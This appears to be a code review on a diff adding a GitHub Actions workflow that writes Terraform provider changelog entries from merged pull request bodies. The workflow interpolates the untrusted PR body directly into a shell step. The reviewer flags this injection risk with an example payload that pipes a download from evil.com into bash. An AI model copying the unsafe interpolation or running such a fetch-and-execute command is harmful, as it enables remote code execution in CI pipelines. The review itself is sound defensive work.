.github/workflows/downstream-changelog.yml

```diff
@@ -0,0 +1,64 @@
+name: downstream-changelog
+on:
+    - pull_request:
+          types:
+              - closed
+jobs:
+    tpg:
+        runs-on: ubuntu-latest
+        name: "Update TPG changelog"
+        if: github.event.pull_request.merged
+        steps:
+            - uses: actions/checkout@v1
+              if: github.event.pull_request.merged
+              with:
+                  path: terraform-provider-google
+                  repository: terraform-providers/terraform-provider-google
+                  ref: master
+            - name: Configure git.
+              run: git config --global user.email "magic-modules@google.com" && git config --global user.name "Modular Magician"
+            - name: "Add changelog entries."
+              run: |
+                  pushd terraform-provider-google
+                  mkdir -p ./.changelog/
+                  echo ${{github.event.pull_request.body}} | sed -e '/```release-note/,/```/!d' > .changelog/${{github.event.pull_request.number}}.txt
```

Comment:
At what point does `${{github.event.pull_request.body}}` get expanded? i.e., if someone sneaks `foo && curl https://evil.com/badstuff | bash #` into the pr would that end up executing `echo foo && curl https://evil.com/badstuff | bash # sed ...`? (I mean, seems unlikely, but we should still protect against it...)